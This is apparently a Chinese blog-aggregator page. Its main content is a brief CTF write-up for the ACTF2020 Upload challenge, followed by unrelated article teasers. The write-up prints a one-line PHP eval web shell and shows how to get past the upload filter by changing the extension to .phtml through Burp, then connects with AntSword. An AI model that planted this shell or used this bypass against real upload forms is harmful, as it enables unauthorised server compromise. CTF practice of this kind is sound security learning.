web：[ACTF2020 新生赛]Upload

news2024/11/24 8:27:49

题目

点进页面，是一个文件上传，能联想到getshell

先尝试随便上传一个文件试试

显示上传的文件以jpg、png、gif结尾的图片

构造一句话木马，再将文件后缀改为jpg

<?php @eval($_POST['1234']);?>

显示上传成功，但是显示无法解析成功

根据之前的上传文件之类的题目，这里使用bp抓包后改后缀名为phtml

上传成功

尝试一下能不能执行php代码

成功执行phpinfo，使用蚁剑链接

去根目录找flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1051081.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！

MySQL学习笔记24

MySQL的物理备份： xtrabackup备份介绍： xtrabackup优缺点： 优点： 1、备份过程快速、可靠（因为是物理备份）；直接拷贝物理文件。 2、支持增量备份，更为灵活； 3、备份…

【数据结构】——顺序表详解

大家好！当我们学习了动态内存管理后，就可以写一个管理数据的顺序表了！！！ 顺序表的理解： 线性表是最基本、最简单、也是最常用的一种数据结构。线性表（linear list）是数据结构的一种…

self-attention、transformer、bert理解

参考李宏毅老师的视频 https://www.bilibili.com/video/BV1LP411b7zS?p2&spm_id_frompageDriver&vd_sourcec67a2725ac3ca01c38eb3916d221e708 一个输入，一个输出，未考虑输入之间的关系！！！ self-attention…

CSS详细基础（三）复合选择器

前两章介绍了CSS中的基础属性，以及一些基础的选择器，本贴开始介绍复合选择器的内容~ 在 CSS 中，可以根据选择器的类型把选择器分为基础选择器和复合选择器，复合选择器是建立在基础选择器之上，对基本选择器进行组合形…

c语言练习70:反转两次的数字

反转两次的数字题⽬描述： 反转⼀个整数意味着倒置它的所有位。例如，反转 2021 得到 1202 。反转 12300 得到 321 ，不保留前导零。给你⼀个整数 num ，反转 num 得到 reversed1 ，接着反转 reversed1 得到 revers…

使用KEIL自带的仿真器仿真遇到问题解决

*** error 65: access violation at 0x40021000 : no read permission 修改debug选项设置为下方内容。

Java之多线程的生产者消费者问题的详细解析

3.生产者消费者 3.1生产者和消费者模式概述【应用】概述生产者消费者模式是一个十分经典的多线程协作的模式，弄懂生产者消费者问题能够让我们对多线程编程的理解更加深刻。所谓生产者消费者问题，实际上主要是包含了两类线程： 一类是生产者…

景别 Front view photo 正面照 Front view photo of a Boston Terrier with smileSide view photo 侧身照 Side view photo of a Boston Terrier with smileBack view photo 背影照 Back view photo of a Boston TerrierFull body 全身照 Full body photo of a Boston Ter…

electron之快速上手

前一篇文章已经介绍了如何创建一个electron项目，没有看过的小伙伴可以去实操一下。接下来给大家介绍一下electron项目的架构是什么样的。 electron之快速上手 electron项目一般有两个进程：主进程和渲染进程。主进程：整个项目的唯一入口&…

2.物联网射频识别，RFID通信原理，RFID读写器与标签无线交互方式、数据反馈方式，RFID调制与解调、编码方式，不同RFID标签与读写器

一。RFID无线识别的原理 1.RFID系统无线通信基本原理如下图所示，左边是读写器（刷卡器），右边是标签（卡），中间通过无线通信方式。标签：（卡） 读写器&#xff…

Sound/播放提示音, Haptics/触觉反馈, LocalNotification/本地通知的使用

1. Sound 播放提示音 1.1 音频文件: tada.mp3， badum.mp3 1.2 文件位置截图: 1.3 实现 import AVKit/// 音频管理器 class SoundManager{// 单例对象 Singletonstatic let instance SoundManager()// 音频播放var player: AVAudioPlayer?enum SoundOption: Stri…

python二维码识别tesseract

window安装tesseract 下载路径： https://digi.bib.uni-mannheim.de/tesseract/ 选择双击安装在D:\sore\teeseract-OCR后： 配置环境变量配置环境变量Path：D:\sore\teeseract-OCR 配置语言包的环境变量TESSDATA_PREFIX： D:\s…

搭建自己的搜索引擎之五

一、前言接上文搭建自己的搜索引擎之四，下面继续介绍茴香豆茴字的另外两种写法。二、Jest Jest是ES的Java Http Rest客户端，它主要是为了弥补以前ES自有API缺少HttpRest接口客户端的不足，但因为现在ES官方已经提供了RestClient ,该项目已…

Dynamic CRM开发 - 实体窗体（二）主窗体

主窗体是功能最丰富，使用场景最多的窗体。主窗体界面如下图：下面按照图中的序号，简述一下窗体的主要功能： 0、窗体的主要布局部分，即用户看到的内容，可以拖动右侧的字段到窗体中想要放置的地方。默认有标题、常规（选项卡）、页脚三部分，常规处于高亮状态，即可以…

第十二章类和对象

C面向对象的三大特性为：封装、继承、多态 C认为万事万物都皆为对象，对象上有其属性和行为例如： 人可以作为对象，属性有姓名、年龄、身高、体重...，行为有走、跑、跳、吃饭、唱歌... 车也可以作为对象，…

docker安装apisix全教程包含windows和linux

docker安装apisix 一、Windows安装1、首先需要安装docker和docker compose，如果直接安装docker desktop，会自动安装docker compose。2、重新启动电脑3、访问 Docker 的下载（[https://www.docker.com/products/docker-desktop](https://www.do…

RocketMQ 版本升级测试

一、背景 RocketMQ 版本升级，3.6.4升级到5.1.3。二、机器资源应用端： 10.XX.67.249【机器 1】 cd /home/product/logs/dolphin_task_test_logs/ vim info.logMQ 服务端： 旧MQ 10.XX.108.249 broker-001。用于测试升级NameServer【机器 2…